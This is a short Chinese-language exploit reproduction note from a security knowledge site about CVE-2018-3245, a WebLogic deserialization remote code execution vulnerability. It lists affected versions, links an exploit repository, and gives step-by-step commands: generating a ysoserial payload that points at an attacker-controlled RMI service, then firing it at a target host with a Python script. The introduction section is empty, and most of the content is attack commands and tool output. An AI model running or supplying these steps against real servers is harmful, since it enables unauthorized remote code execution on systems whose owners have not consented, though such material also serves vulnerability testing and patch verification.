menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right 134-WebLogic chevron_right 010-CVE-2018-3245 WebLogic反序列化远程代码执行漏洞.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    010-CVE-2018-3245 WebLogic反序列化远程代码执行漏洞.md
    837 B / 2021-07-17 00:01:30
        # CVE-2018-3245 WebLogic反序列化远程代码执行漏洞
    
    ### 一、漏洞简介
    
    ### 二、漏洞影响
    
    WebLogic 10.3.6.0
    
    WebLogic 12.1.3.0
    
    WebLogic 12.2.1.3
    
    ### 三、复现过程
    
    https://github.com/ianxtianxt/CVE-2018-3245
    
    Step 1
    
    `java -jar ysoserial-cve-2018-3245.jar`
    
    
    ```bash
    WHY SO SERIAL?
    Usage: java -jar ysoserial-cve-2018-3245.jar [payload] '[command]'
    Available payload types:
         Payload         Authors   Dependencies
         -------         -------   ------------
         CVE_2018_2893_1 @mbechler
         CVE_2018_2893_2 @mbechler
         CVE_2018_2893_3 @mbechler
         CVE_2018_3245   @mbechler
         JRMPClient      @mbechler
         Jdk7u21         @frohoff
    ```
    
    Step 2
    
    `java -jar ysoserial-cve-2018-3245.jar CVE_2018_3245 "[RMI_SERVICE_IP]:[PORT]" > poc5.ser`
    
    Step 3
    
    `python weblogic.py [TARGET_HOST] [PORT] poc5.ser`
    
    links
    file_download